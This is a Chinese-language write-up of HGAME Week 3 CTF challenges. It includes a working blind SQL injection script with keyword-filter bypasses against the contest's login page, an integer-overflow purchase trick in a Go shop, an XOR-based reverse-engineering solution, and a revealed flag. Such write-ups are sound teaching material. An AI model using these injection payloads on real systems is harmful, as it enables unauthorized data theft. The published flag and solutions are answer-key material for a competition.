

Week3 比赛地址:https://hgame.vidar.club/contest/4

[WEB] Login To Get My Gift

经过测试,and、空格、substrmid等被过滤,但是orleftright等可以使用。笔者猜测,SQL语句大抵是类似SELECT * FROM table WHERE username='xxx' and password='xxx' ...的,因此,如果在password处截断注入,而且使用or语句,则需要保证usernamepassword不同时正确,否则无法进行盲注(或者也可以使用时间盲注,这样就不用考虑回显了)。



import stringimport requestsif __name__ == '__main__':url = "http://week-3.hgame.lwsec.cn:30453/login"index = 0s = ''trytxt = "(SELECt/*a*/group_Concat(PAssw0rD)/*a*/frOm/*a*/User1nf0mAt1on)"curr_index = 0while True:for i in range(32, 127):ret = requests.post(url, data={'username': 'testuser','password': 'testpassword1\'Or/*a*/if(ascii(right(%s,%s))-%s,0,1)#' % (trytxt, index + 1, i)})if 'Success' in ret.text:s = chr(i) + sprint(s)breakindex += 1















[WEB] Gopher Shop


func BuyProduct(context *gin.Context) {username, _ := context.Get("username")user, err := db.GetUserByUsername(username.(string))if err != nil {return}product := context.Query("product")price, err := db.GetProductPrice(product)number, err := strconv.Atoi(context.Query("number"))//校验是否买的起if err != nil || number < 1 || user.Balance < uint(number)*price {context.JSON(400, gin.H{"error": "invalid request"})return}// ...


 println("total:", uint(number)*price, err)println("number:", uint(number), err)

经过测试,strconv.Atoi似乎对于一切大于9223372036854775808的数,都会强制转换为9223372036854775808,同时,uint(number)*price的最大乘积结果为18446744073709551616,超出后就会溢出。在商店中,我们看到Apple的售价是10,而10∗184467440737095516210*184467440737095516210∗1844674407370955162在该程序中得出的结果是4(即相比于最大值18446744073709551616,溢出了4),我们的初始余额(Vidar Coin)是10,因此,可以利用这个漏洞购买大量的林檎苹果,然后再出售,即可获得足够购买flag程度的余额了。



[WEB] Ping To The Host

这道题在第三周中算是难度较低的一道,简单来说,就是一个无回显的linux shell,不过后端过滤了flag、空格、cat等字符,需要进行一个简单的绕过。






[REVERSE] kunmusic



if __name__ == '__main__':f = open(r"C:\Users\vvbbnn00\Desktop\hgame\kmusic\data.bin", "rb")byte = bytearray()for i in f.read():byte.append(i^104)open(r'C:\Users\vvbbnn00\Desktop\hgame\kmusic\secret', 'wb').write(byte)


 public void music(object sender, EventArgs e){if (num[0] + 52296 + num[1] - 26211 + num[2] - 11754 + (num[3] ^ 0xA114) + num[4] * 63747 + num[5] - 52714 + num[6] - 10512 + num[7] * 12972 + num[8] + 45505 + num[9] - 21713 + num[10] - 59122 + num[11] - 12840 + (num[12] ^ 0x525F) == 12702282 && num[0] - 25228 + (num[1] ^ 0x50DB) + (num[2] ^ 0x1FDE) + num[3] - 65307 + num[4] * 30701 + num[5] * 47555 + num[6] - 2557 + (num[7] ^ 0xBF9F) + num[8] - 7992 + (num[9] ^ 0xE079) + (num[10] ^ 0xE052) + num[11] + 13299 + num[12] - 50966 == 9946829 && num[0] - 64801 + num[1] - 60698 + num[2] - 40853 + num[3] - 54907 + num[4] + 29882 + (num[5] ^ 0x3506) + (num[6] ^ 0x533E) + num[7] + 47366 + num[8] + 41784 + (num[9] ^ 0xD1BA) + num[10] * 58436 + num[11] * 15590 + num[12] + 58225 == 2372055 && num[0] + 61538 + num[1] - 17121 + num[2] - 58124 + num[3] + 8186 + num[4] + 21253 + num[5] - 38524 + num[6] - 48323 + num[7] - 20556 + num[8] * 56056 + num[9] + 18568 + num[10] + 12995 + (num[11] ^ 0x995C) + num[12] + 25329 == 6732474 && num[0] - 42567 + num[1] - 17743 + num[2] * 47827 + num[3] - 10246 + (num[4] ^ 0x3F9C) + num[5] + 39390 + num[6] * 11803 + num[7] * 60332 + (num[8] ^ 0x483B) + (num[9] ^ 0x12BB) + num[10] - 25636 + num[11] - 16780 + num[12] - 62345 == 14020739 && num[0] - 10968 + num[1] - 31780 + (num[2] ^ 0x7C71) + num[3] - 61983 + num[4] * 31048 + num[5] * 20189 + num[6] + 12337 + num[7] * 25945 + (num[8] ^ 0x1B98) + num[9] - 25369 + num[10] - 54893 + num[11] * 59949 + (num[12] ^ 0x3099) == 14434062 && num[0] + 16689 + num[1] - 10279 + num[2] - 32918 + num[3] - 57155 + num[4] * 26571 + num[5] * 15086 + (num[6] ^ 0x59CA) + (num[7] ^ 0x5B35) + (num[8] ^ 0x3FFD) + (num[9] ^ 0x5A85) + num[10] - 40224 + num[11] + 31751 + num[12] * 8421 == 7433598 && num[0] + 28740 + num[1] - 64696 + num[2] + 60470 + num[3] - 14752 + (num[4] ^ 0x507) + (num[5] ^ 0x89C8) + num[6] + 49467 + num[7] - 33788 + num[8] + 20606 + (num[9] ^ 0xAF4A) + num[10] * 19764 + num[11] + 48342 + num[12] * 56511 == 7989404 && (num[0] ^ 0x7132) + num[1] + 23120 + num[2] + 22802 + num[3] * 31533 + (num[4] ^ 0x9977) + num[5] - 48576 + (num[6] ^ 0x6F7E) + num[7] - 43265 + num[8] + 22365 + num[9] + 61108 + num[10] * 2823 + num[11] - 30343 + num[12] + 14780 == 3504803 && num[0] * 22466 + (num[1] ^ 0xDABF) + num[2] - 53658 + (num[3] ^ 0xB838) + (num[4] ^ 0x30DF) + num[5] * 59807 + num[6] + 46242 + num[7] + 3052 + (num[8] ^ 0x62BF) + num[9] + 30202 + num[10] * 22698 + num[11] + 33480 + (num[12] ^ 0x4175) == 11003580 && num[0] * 57492 + (num[1] ^ 0x346D) + num[2] - 13941 + (num[3] ^ 0xBBDC) + num[4] * 38310 + num[5] + 9884 + num[6] - 45500 + num[7] - 19233 + num[8] + 58274 + num[9] + 36175 + (num[10] ^ 0x4888) + num[11] * 49694 + (num[12] ^ 0x2501) == 25546210 && num[0] - 23355 + num[1] * 50164 + (num[2] ^ 0x873A) + num[3] + 52703 + num[4] + 36245 + num[5] * 46648 + (num[6] ^ 0x12FA) + (num[7] ^ 0xA376) + num[8] * 27122 + (num[9] ^ 0xA44A) + num[10] * 15676 + num[11] - 31863 + num[12] + 62510 == 11333836 && num[0] * 30523 + (num[1] ^ 0x1F36) + num[2] + 39058 + num[3] * 57549 + (num[4] ^ 0xD0C0) + num[5] * 4275 + num[6] - 48863 + (num[7] ^ 0xD88C) + (num[8] ^ 0xA40) + (num[9] ^ 0x3554) + num[10] + 62231 + num[11] + 19456 + num[12] - 13195 == 13863722){int[] array = new int[47]{132, 47, 180, 7, 216, 45, 68, 6, 39, 246,124, 2, 243, 137, 58, 172, 53, 200, 99, 91,83, 13, 171, 80, 108, 235, 179, 58, 176, 28,216, 36, 11, 80, 39, 162, 97, 58, 236, 130,123, 176, 24, 212, 56, 89, 72};string text = "";for (int i = 0; i < array.Length; i++){text += (char)(array[i] ^ num[i % num.Length]);}new SoundPlayer(Resources.过年鸡).Play();MessageBox.Show(text);}}

很明显,这是一个十分复杂的方程,flag似乎就藏在array[i] ^ num[i % num.Length]的计算结果中。那么,后面需要做的事情便很明了了——解方程吧。但是,我不会!我不会!我不会! 怎么办?
我们知道,hgame的flag通常以hgame{开头,以}结尾,而分析代码发现,num只有13个,而密文的长度为47,则必然会存在重复,我们已知明文的前6位和最后一位(第46位),根据异或计算的特性,自然能够知道这些位置对应的秘钥,也就是说,秘钥的第0-5位和第7位(46Mod13=746 Mod 13 = 746Mod13=7)已知,剩下5位未知。同时,密文中,第0-513-18、…位和第4633…位都可以先破译出来,剩下的只要猜猜就能出来啦(

#include <stdio.h>
#include <string.h>char pass(int *num) {return num[0] + 52296 + num[1] - 26211 + num[2] - 11754 + (num[3] ^ 0xA114) + num[4] * 63747 + num[5] - 52714 + num[6] - 10512 + num[7] * 12972 + num[8] + 45505 + num[9] - 21713 + num[10] - 59122 + num[11] - 12840 + (num[12] ^ 0x525F) == 12702282 && num[0] - 25228 + (num[1] ^ 0x50DB) + (num[2] ^ 0x1FDE) + num[3] - 65307 + num[4] * 30701 + num[5] * 47555 + num[6] - 2557 + (num[7] ^ 0xBF9F) + num[8] - 7992 + (num[9] ^ 0xE079) + (num[10] ^ 0xE052) + num[11] + 13299 + num[12] - 50966 == 9946829 && num[0] - 64801 + num[1] - 60698 + num[2] - 40853 + num[3] - 54907 + num[4] + 29882 + (num[5] ^ 0x3506) + (num[6] ^ 0x533E) + num[7] + 47366 + num[8] + 41784 + (num[9] ^ 0xD1BA) + num[10] * 58436 + num[11] * 15590 + num[12] + 58225 == 2372055 && num[0] + 61538 + num[1] - 17121 + num[2] - 58124 + num[3] + 8186 + num[4] + 21253 + num[5] - 38524 + num[6] - 48323 + num[7] - 20556 + num[8] * 56056 + num[9] + 18568 + num[10] + 12995 + (num[11] ^ 0x995C) + num[12] + 25329 == 6732474 && num[0] - 42567 + num[1] - 17743 + num[2] * 47827 + num[3] - 10246 + (num[4] ^ 0x3F9C) + num[5] + 39390 + num[6] * 11803 + num[7] * 60332 + (num[8] ^ 0x483B) + (num[9] ^ 0x12BB) + num[10] - 25636 + num[11] - 16780 + num[12] - 62345 == 14020739 && num[0] - 10968 + num[1] - 31780 + (num[2] ^ 0x7C71) + num[3] - 61983 + num[4] * 31048 + num[5] * 20189 + num[6] + 12337 + num[7] * 25945 + (num[8] ^ 0x1B98) + num[9] - 25369 + num[10] - 54893 + num[11] * 59949 + (num[12] ^ 0x3099) == 14434062 && num[0] + 16689 + num[1] - 10279 + num[2] - 32918 + num[3] - 57155 + num[4] * 26571 + num[5] * 15086 + (num[6] ^ 0x59CA) + (num[7] ^ 0x5B35) + (num[8] ^ 0x3FFD) + (num[9] ^ 0x5A85) + num[10] - 40224 + num[11] + 31751 + num[12] * 8421 == 7433598 && num[0] + 28740 + num[1] - 64696 + num[2] + 60470 + num[3] - 14752 + (num[4] ^ 0x507) + (num[5] ^ 0x89C8) + num[6] + 49467 + num[7] - 33788 + num[8] + 20606 + (num[9] ^ 0xAF4A) + num[10] * 19764 + num[11] + 48342 + num[12] * 56511 == 7989404 && (num[0] ^ 0x7132) + num[1] + 23120 + num[2] + 22802 + num[3] * 31533 + (num[4] ^ 0x9977) + num[5] - 48576 + (num[6] ^ 0x6F7E) + num[7] - 43265 + num[8] + 22365 + num[9] + 61108 + num[10] * 2823 + num[11] - 30343 + num[12] + 14780 == 3504803 && num[0] * 22466 + (num[1] ^ 0xDABF) + num[2] - 53658 + (num[3] ^ 0xB838) + (num[4] ^ 0x30DF) + num[5] * 59807 + num[6] + 46242 + num[7] + 3052 + (num[8] ^ 0x62BF) + num[9] + 30202 + num[10] * 22698 + num[11] + 33480 + (num[12] ^ 0x4175) == 11003580 && num[0] * 57492 + (num[1] ^ 0x346D) + num[2] - 13941 + (num[3] ^ 0xBBDC) + num[4] * 38310 + num[5] + 9884 + num[6] - 45500 + num[7] - 19233 + num[8] + 58274 + num[9] + 36175 + (num[10] ^ 0x4888) + num[11] * 49694 + (num[12] ^ 0x2501) == 25546210 && num[0] - 23355 + num[1] * 50164 + (num[2] ^ 0x873A) + num[3] + 52703 + num[4] + 36245 + num[5] * 46648 + (num[6] ^ 0x12FA) + (num[7] ^ 0xA376) + num[8] * 27122 + (num[9] ^ 0xA44A) + num[10] * 15676 + num[11] - 31863 + num[12] + 62510 == 11333836 && num[0] * 30523 + (num[1] ^ 0x1F36) + num[2] + 39058 + num[3] * 57549 + (num[4] ^ 0xD0C0) + num[5] * 4275 + num[6] - 48863 + (num[7] ^ 0xD88C) + (num[8] ^ 0xA40) + (num[9] ^ 0x3554) + num[10] + 62231 + num[11] + 19456 + num[12] - 13195 == 13863722;
}int main() {int array[] = {132, 47, 180, 7, 216, 45, 68, 6, 39, 246,124, 2, 243, 137, 58, 172, 53, 200, 99, 91,83, 13, 171, 80, 108, 235, 179, 58, 176, 28,216, 36, 11, 80, 39, 162, 97, 58, 236, 130,123, 176, 24, 212, 56, 89, 72};char known[] = "hgame{";int num[13] = {0};// knownfor (int i = 0; i < 6; i++) {num[i] = known[i] ^ array[i];}num[7] = 72 ^ '}';// guessnum[6] = 62;num[12] = 133;num[11] = 93;num[8] = 120; // ?num[9] = 199;num[10] = 15;for (int i = 0; i < 13; i++) {if (num[i]) printf("%d, ", num[i]);}printf("check: %s \n", pass(num) ? "Pass" : "Fail");int length = sizeof(array) / sizeof(int);printf("length:%d\n", length);char text[48] = "";for (int j = 0; j < length; j++) {if (num[j % 13] == 0) continue;text[j] = (char)(array[j] ^ num[j % 13]);}if (pass(num)) {printf("%s", text);return 0;}for (int i = 6; i < 13; i++) {if (num[i] != 0) continue;printf("Trying N%d...\n", i);for (int j = 0; j < length; j++) {if (num[j % 13] == 0) text[j] = '?';}for (int k = 0; k < 256; k++) {char pass = 1;for (int j = i; j < length; j += 13) {int tmp = (char)(array[j] ^ k);if (tmp > 126 || tmp < 32 || tmp == '{' || tmp == '}' || tmp == ' ') {pass = 0;break;}}if (!pass) continue;for (int j = i; j < length; j += 13) {text[j] = (char)(array[j] ^ k);}printf("possible: %s, k=%d\n", text, k);}getchar();}
//  printf("%s", text);// hgame{z3_1s_very_u5eful_1n_rever5e_engin3ering}


236, 72, 213, 106, 189, 86, 62, 53, 120, 199, 15, 93, 133




[MISC] Tunnel



[MISC] 3ctu4_card_problem


Please distinguish the type of the cards.(ptcg: 0, ygo: 1)
Input the answer in the order of the cards.(e.g. 10101010)
Press Enter to continue...






# Please distinguish the type of the cards.(ptcg: 0, ygo: 1)
# Input the answer in the order of the cards.(e.g. 10101010)
import base64
import os
import zipfileimport pwn
import paddlex as pdx
import cv2print("Loading model...")
model = pdx.load_model('./kpfl/inference_model/inference_model/')
print("Model loaded.")replace = """Please distinguish the type of the cards.(ptcg: 0, ygo: 1)
Input the answer in the order of the cards.(e.g. 10101010)
Press Enter to continue..."""replace2 = """ > """def get_res(path):im = cv2.imread(path)im = im.astype('float32')result = model.predict(im)return resultif __name__ == '__main__':conn = pwn.remote("week-3.hgame.lwsec.cn", 30102)conn.sendafter(b"Press Enter to continue...", b"\n")data = conn.recvline()# data = open("week3_f.txt", 'rb').read()data = data.decode().replace(replace, "").replace(replace2, "")data = base64.b64decode(data)open("file.zip", "wb").write(data)file = zipfile.ZipFile('file.zip')file.extractall(path="./extract/")file.close()result = ""for i in range(0, 100):p = os.path.join("./extract/", f'{i}.png')res = get_res(p)res = res[0].get("category_id")result += str(res)print(res, end="")conn.sendline(result.encode())conn.interactive()




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